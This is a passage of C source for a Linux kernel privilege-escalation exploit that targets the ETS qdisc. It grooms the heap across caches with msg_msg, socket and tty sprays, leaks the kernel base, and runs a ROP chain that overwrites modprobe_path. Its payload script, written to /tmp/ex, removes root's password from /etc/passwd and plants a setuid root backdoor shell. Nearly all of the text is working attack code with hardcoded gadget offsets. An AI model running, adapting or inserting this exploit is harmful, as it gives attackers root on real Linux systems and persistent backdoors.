  make_slabs(evict_slabs_p, ev_pre_post_ptr, EVICT_N, PRE, POST);

  uint64_t leak = 0;
  int sock_fd = 0;

  uint64_t kbase = 0;
  uint64_t k2kleak = 0;
  // First im gonna spray a whole bunch of netlink socks
  // Hopefully this makes leaks a bit more consistent
  struct sockaddr_nl src_addr, dest_addr;
  struct nlmsghdr *nlh = NULL;
  struct iovec iov;
  int ret = 0; // system(cmd);

  int idx = if_nametoindex("lo");
  if (!idx) {
    perror("if_nametoindex ");
  }
  printf("[!] lo idx: %d\n", idx);

  uint32_t quant = 0;
  uint32_t tmp = quant;

  //  Should allocate enought space for the socket struct
  //  For our msgmsg sploitation
  char msg[COMP_SZ_MAX] = {0};

  // For testing quant leaks
  uint64_t top = 0xffff8880;

  // Old commands, now we have functions that do most of this.
  // const char *cmd = "tc qdisc add dev lo root handle 1: ets bands 9 "
  //                   "priomap 7 6 5 4 3 2 1 4 7; ip link set dev lo up";
  // const char *cmd1 = "tc qdisc add dev lo parent 1:1 handle 2: ets bands 9 "
  //                    "priomap 7 6 5 4 3 2 1 4 7;";
  // const char *rm_cmd =
  //     "tc qdisc delete lo parent 1 handle 2; ip link set dev lo down";

  // We want to free our qdisc, so that when we reclaim the slab during cross
  // cache we may get the same area as msg_msg. Meaning our leak is somewhat
  // reliable (gosh i know).

  memset(msg, '\x41', COMP_SZ_MAX);

  //  Now cross cache and spray msg
  do_cross_cache_qdisc(&quant, idx);

  ret = msg_spray_nodiag(COMP_SZ_MAX, msg, MSG_SPRAY / 2, qid);

  sock_fd = setup_rtnet(&src_addr, &dest_addr);
  // Spray some sockets here.......
  int junk[TOTAL_ALLOC] = {0};
  for (int i = 0; i < TOTAL_ALLOC; i++) {
    junk[i] = socket(PF_NETLINK, SOCK_RAW, NETLINK_ROUTE);
  }

  struct sockaddr_vm addr = {0};

  // Step 1: Alloc target object with pre and post allocations

  int pre_post[PRE + POST] = {0};

  for (int i = 0; i < PRE; i++) {
    pre_post[i] = socket(PF_NETLINK, SOCK_RAW, NETLINK_ROUTE);
  }

  printf("[*] Making another qdisc...\n");
  //  Allocate our qdisc here

  create_qdisc(sock_fd, idx, &dest_addr, 1, TC_H_ROOT);
  system("ip link set dev lo up");
  sleep(1);
  // We need to leak stuff here

  //   As well as padding out the rest of the allocation, this also serves the
  //   purpose of setting a new active slab.
  for (int i = PRE; i < PRE + POST; i++) {
    pre_post[i] = socket(PF_NETLINK, SOCK_RAW, NETLINK_ROUTE);
  }

  if (quant & 0xf00) {
    quant &= (~0xfff);
    quant += 0x180;
  }

  uint32_t msg_dst = quant - 0x180 + 0x30;

  do_ptr_write(idx, msg_dst, 1, sock_fd, &dest_addr);

  // Write can be used multiple times as long as we turn on and off the qdisc
  // to empty the class packet queue, otherwise we cant enter the code inside
  // ets_qdisc_enqueue that writes the ptr.

  char *mrecv;
  uint64_t qdisc_ptr_leak = 0;
  int i = 0;

  memset(msg, '\xff', COMP_SZ_MAX);
  for (i = 0; i < MSG_SPRAY / 2; i++) {
    // Release and immediately reclaim the messages we are sending.
    // This means when we break we free the correct msg and can then
    // just grab it and do whatever we want with it being free.
    mrecv = recv_msg(qid[i], COMP_SZ_MAX, 0, 0);
    if (mrecv[8 + 1] != '\x41') {
      printf("[!] Found: %d....\n", i);
      dumph(mrecv + 8, 0x8, ' ');
      qdisc_ptr_leak = *(uint64_t *)(&mrecv[8]);
      break;
    }
    send_msg(qid[i], COMP_SZ_MAX, msg, i + 1);
    free(mrecv);
  }

  if (!qdisc_ptr_leak) {
    // We will likely just crash here regardless lol
    printf("[!] Cross cache failed lol. Retry\n");
    return;
  }
  free(mrecv);

  char msg1[NEWCOMPSZ];
  memset(msg1, '\x43', NEWCOMPSZ);
  send_msg(qid[i], NEWCOMPSZ, msg1, i);

  printf("[*] Qdisc full heap ptr leak: %p\n", (void *)qdisc_ptr_leak);

  //  Now we need even MOAR leaks i think. Should done this before probably.
  //  Hit the next ptr -- hopefully. This also smashes the type, so we need to
  //  kinda fill in the gaps
  do_ptr_write(idx, quant - 0x180 + 0x20, 1, sock_fd, &dest_addr);

  // Now if we release the qdisc we will have a dangling ptr left in the next
  // seg ptr
  // int spray_socks_corruptable[0x200];
  int spray_socks_corruptable[0x150];

  for (int i = 0;
       i < sizeof(spray_socks_corruptable) / sizeof(spray_socks_corruptable[0]);
       i++) {
    //  No worky, need better objects
    spray_socks_corruptable[i] = socket(PF_PACKET, SOCK_DGRAM, 0);
    if (spray_socks_corruptable[i] < 0) {
      perror("PF_PACKET spray");
      exit(-1);
    }
  }
  // Release, hopefully the qdisc will land somewhere in here
  for (int i = 0;
       i < sizeof(spray_socks_corruptable) / sizeof(spray_socks_corruptable[0]);
       i++) {
    close(spray_socks_corruptable[i]);
  }
  printf("[!] Trying to add a child qdisc fo an xtra read....\n");
  // Parent of 1:1
  // g_parent = ;
  int parent_hnd = (1 << 16) | 1;
  create_qdisc(sock_fd, idx, &dest_addr, 2, parent_hnd);
  sleep(1);
  close(sock_fd);
  // Need to reset the socket state here otherwise it fucks up the quant leak
  // we get...
  sock_fd = setup_rtnet(&src_addr, &dest_addr);
  // g_handle = 2;
  //    Gets us a leak from the current kmalloc 2k cache
  uint32_t quant1 = get_quant(sock_fd, idx, &dest_addr, 0, 2, TC_H_ROOT);

  // Fill in the holes hopefully adjacent to the child qisc and thus in range
  // of the leaks.
  for (int i = 0;
       i < sizeof(spray_socks_corruptable) / sizeof(spray_socks_corruptable[0]);
       i++) {
    //  No worky, need better objects
    spray_socks_corruptable[i] = socket(PF_PACKET, SOCK_DGRAM, 0);
    if (spray_socks_corruptable[i] < 0) {
      perror("PF_PACKET spray");
      exit(-1);
    }
  }

  printf("[!] Deleting qdisc child...");

  del_qdisc(sock_fd, idx, &dest_addr, 2);
  // Dont think we *need* 10 seconds, but reliability and stuff
  sleep(10);
  // sleep(6);
  uint64_t sock_target = (quant1 - 0x180 + (0x800 * 2));

  printf("[*] Socket hopefully: 0x%lx\n", sock_target);
  printf("[*] skc_prot: 0x%lx\n", sock_target + 0x28);

  sock_to_use = sock_fd;
  dst_addr_glb = &dest_addr;
  do_ptr_write(idx, sock_target + 0x28 - (0x800), 1, sock_fd, &dest_addr);

  printf("[*] Releasing QDISC a second time lol...\n");

  del_qdisc(sock_fd, idx, &dest_addr, 1);
  sleep(10);
  // sleep(6);
  close(sock_fd);

  // HERE WE ALSO NEED TO DO THE STEPS FOR CROSS CACHE AGAIN...

  // Now start freeing moar shit.
  // Free one obj per slab to overflow partial list
  for (int i = 0; i < TOTAL_ALLOC; i += OBJ_PER_SLAB) {
    close(junk[i]);
  }

  for (int i = 0; i < PRE + POST; i++) {
    close(pre_post[i]);
  }

  for (int i = 0; i < TOTAL_ALLOC; i++) {
    close(junk[i]);
  }

  // MASSIVE reliability improvement
  sleep(3);
  // Shouldve discarded slab, now need to check.

  // Try to reclaim with sockets
  printf("[!] Starting le big spray again...\n");
  int new_spray_sz = 0x400 - MSGSZ;
  memset(msg1, 'V', new_spray_sz);
  *(uint64_t *)(&msg1[0x180 - 0x30]) = 0;

  // Now we need to try to evict the page from the percpu freelist.
  // Hopefully at this point we can get the page back in rotation.
  release_slabs(evict_slabs_p, ev_pre_post_ptr, EVICT_N, PRE, POST);

  sleep(2);

  // Need to be able to identify each msg
  {
    int msgsz = new_spray_sz;
    char *msgtxt = msg1;
    int spray_n = MSG_SPRAY * 2;
    int *qstore = qid1;
    int qidn = 0;
    int ret = -1;
    socklen_t len = 0;
    char mbuf[msgsz + MSGSZ];
    struct msgbuf *msg = (struct msgbuf *)mbuf;
    msgsz -= (MSGSZ);
    memcpy(msg->mtext, msgtxt, msgsz);
    for (int j = 0; j < spray_n; j++) {
      msg->mtype = MSG_SPRAY + j + 1;
      qidn = qstore[j];
      *(uint64_t *)(&msg->mtext[0x188 - 0x30]) = MSG_SPRAY + j + 1;
      if (msgsnd(qidn, msg, msgsz, 0) < 0) {
        printf("j: %d\tqid: %d\tmsgsz: 0x%x\n", j, qidn, msgsz);
        perror("msgsnd lol");
        exit(-1);
      }
    }
  }

  printf("[!] Receiving...");
  char *mrecv1 = recv_msg_CPY(qid[i], NEWCOMPSZ, 1, 0);
  uint64_t seg_idx = *(uint64_t *)(&mrecv1[MSGMSGSZ + 8]);

  printf("[*] Controlled seg idx: 0x%lx -> 0x%lx\n", seg_idx,
         seg_idx - (MSG_SPRAY + 1));

  seg_idx -= (MSG_SPRAY + 1);
  free(mrecv1);
  mrecv1 = recv_msg(qid1[seg_idx], new_spray_sz, 0, 0);
  dumph(mrecv1, 0x10, ' ');
  free(mrecv1);

  // Need moar raaaagh
  int spray_socks[0x200 - 4 - 1 + 0x50];
  for (int i = 0; i < sizeof(spray_socks) / sizeof(spray_socks[0]); i++) {
    if ((spray_socks[i] = open("/dev/ptmx", O_RDWR | O_NOCTTY)) <= 2) {
      printf("i: %d\n", i);
      perror("tty_struct spray open");
      exit(-1);
    }
  }

  mrecv1 = recv_msg_CPY(qid[i], NEWCOMPSZ, 1, 0);
  const int subtract = (5 * 0x10) - 8;
  dumph(&mrecv1[NEWCOMPSZ - (subtract)], subtract, ' ');
  uint64_t do_tty_hangup = *(uint64_t *)(&mrecv1[NEWCOMPSZ - (subtract)]);
  kbase = do_tty_hangup - 0xadde80;
  printf("[*] Kbase: %p\n", kbase);
  free(mrecv1);

  // Need to do this so we can reclaim the tty_spray objects and abuse the
  // fact that we have written a second ptr.
  for (int i = 0; i < sizeof(spray_socks) / sizeof(spray_socks[0]); i++) {
    close(spray_socks[i]);
  }

  sleep(2);

  // Rellocate AFTER the leaks.
  {
    new_spray_sz = 0x400 - MSGSZ;
    int msgsz = new_spray_sz;
    memset(msg1, 'B', new_spray_sz);

    char *msgtxt = msg1;
    int spray_n = MSG_SPRAY * 2;
    int *qstore = qid1;
    int ret = -1;
    socklen_t len = 0;
    char mbuf[msgsz + MSGSZ];
    const uint64_t mov_rsp_rax_pop_rbx_ret = kbase + 0xf95cc;
    const uint64_t pivgdg = mov_rsp_rax_pop_rbx_ret;
    const uint64_t modprobe = kbase + 0x295eb30;
    const uint64_t mov_qword_ptr_rsi_rdx_pop_rbx_ret = kbase + 0xe4fdb2;
    const uint64_t pop_rsi_ret = kbase + 0x1518;
    const uint64_t pop_rdx_ret = kbase + 0x173942;
    uint64_t user_pc = (uint64_t)&retfunc;
    // const uint64_t swapgs_return_to_usermode = kbase + 0x1401265;
    // const uint64_t swapgs_return_to_usermode = kbase + 0x140118b;
    const uint64_t swapgs_return_to_usermode = kbase + 0x1401126;
    struct msgbuf *msg = (struct msgbuf *)mbuf;
    msgsz -= (MSGSZ);
    memset(msg->mtext, 0, msgsz);
    memcpy(msg->mtext, msgtxt, msgsz);
    msg->mtype = 1;
    *(uint32_t *)(&msg->mtext[216]) = 0;
    *(uint32_t *)(&msg->mtext[0x228]) = 0;
    *(uint64_t *)(&msg->mtext[160]) = 0x4142434445464748;
    *(uint64_t *)(&msg->mtext[0x1f0]) = pivgdg;
    uint32_t write = (0x188 - 0x30) / 8;
    uint64_t *mptr = (uint64_t *)(&msg->mtext[0]);
    mptr[write++] = pop_rsi_ret;
    mptr[write++] = modprobe;
    mptr[write++] = pop_rdx_ret;
    // /tmp/ex\x00
    mptr[write++] = 0x0078652f706d742f;
    // Should hopefully skip raw_prot ptr in our payload.
    mptr[write++] = mov_qword_ptr_rsi_rdx_pop_rbx_ret;
    // Skip raw_prot
    write++;
    // Should be doing swapgs; ... iretq
    mptr[write++] = swapgs_return_to_usermode;
    // Now the arg arrangements for iretq
    mptr[write++] = 0x7777777777777777;
    mptr[write++] = 0x7777777777777777;
    mptr[write++] = user_pc;
    mptr[write++] = user_cs;
    mptr[write++] = user_rflags;
    mptr[write++] = user_sp;
    mptr[write++] = user_ss;
    // Random padding
    mptr[write++] = 0x7777777777777777;
    for (int i = 0; i < spray_n; i++) {
      if (msgsnd(qstore[i], msg, msgsz, 0) < 0) {
        printf("i: %d\tsz: 0x%x\n", i, msgsz);
        perror("msgsnd lol");
        ret = -1;
        // exit(-1);
        break;
      }
    }
  }

  // One of these will (please) trigger packet_ops->release_cb and start our
  // ropchain.
  for (int i = 0;
       i < sizeof(spray_socks_corruptable) / sizeof(spray_socks_corruptable[0]);
       i++) {
    close(spray_socks_corruptable[i]);
  }
  return;
}

void setup_ns_stuff() {
  setup_namespace();
  // make_net_ns();
}

// This is a rlly rlly silly script huh
// const char mprobe_scr[] = "#!/bin/sh\nwhoami\necho \"ERM\" > /eggsdee";
const char mprobe_scr[] =
    "#!/bin/sh\nsed -i -e 's/root:x:/root::/g' /etc/passwd\necho "
    "'#!/bin/sh\\necho \"HIIII\"\\n/bin/sh' > /backdoor.sh\nchmod root:root "
    "/backdoor.sh; chmod "
    "4777 /backdoor.sh";

int main() {

  int idx = if_nametoindex("eth0");
  if (!idx) {
    perror("if_nametoindex ");
  }
  printf("eth0 idx: %d\n", idx);

  // Write evil shell script
  int f = open("/tmp/ex", O_CREAT | O_RDWR, S_IRWXU);
  if (f < 0) {
    perror("open mprobe scr");
    return -1;
  }
  write(f, mprobe_scr, sizeof(mprobe_scr));
  close(f);

  // Save registers for when we return from kernel mode
  save_state();

  setup_ns_stuff();

  do_exp();
  return 0;
}